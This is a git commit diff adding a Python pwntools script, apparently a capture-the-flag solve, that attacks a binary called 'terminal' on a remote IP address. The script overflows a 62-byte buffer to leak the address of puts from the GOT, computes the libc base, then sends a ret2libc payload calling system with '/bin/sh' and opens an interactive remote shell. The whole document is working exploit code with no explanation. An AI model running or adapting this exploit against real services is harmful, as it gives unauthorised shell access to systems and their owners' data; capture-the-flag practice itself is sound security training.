solve script

2024-10-22 11:09:40 +03:00
parent e5fdadee3c
commit f41ca12d8d
1 changed files with 33 additions and 0 deletions
@@ -0,0 +1,33 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./terminal", checksec=False)
+# r = process()
+r = remote("20.199.76.210", 1005)
+
+# func
+s = lambda a: r.sendlineafter(b"# ", a)
+
+# leak
+buf = b"A"*62
+buf += p32(target.sym.puts)
+buf += p32(0x804974d)
+buf += p32(target.got.puts)
+s(buf)
+puts = u32(r.recv(4))
+log.info("puts: 0x%lx", puts)
+libc_base = puts - 0x76aa0
+log.info("libc: 0x%lx", libc_base)
+system = libc_base + 0x4f8f0
+log.info("system: 0x%lx", system)
+sh = libc_base + 0x1bcde8
+
+# shell
+buf = b"A"*62
+buf += p32(system)
+buf += b"BLUH"
+buf += p32(sh)
+s(buf)
+
+r.interactive()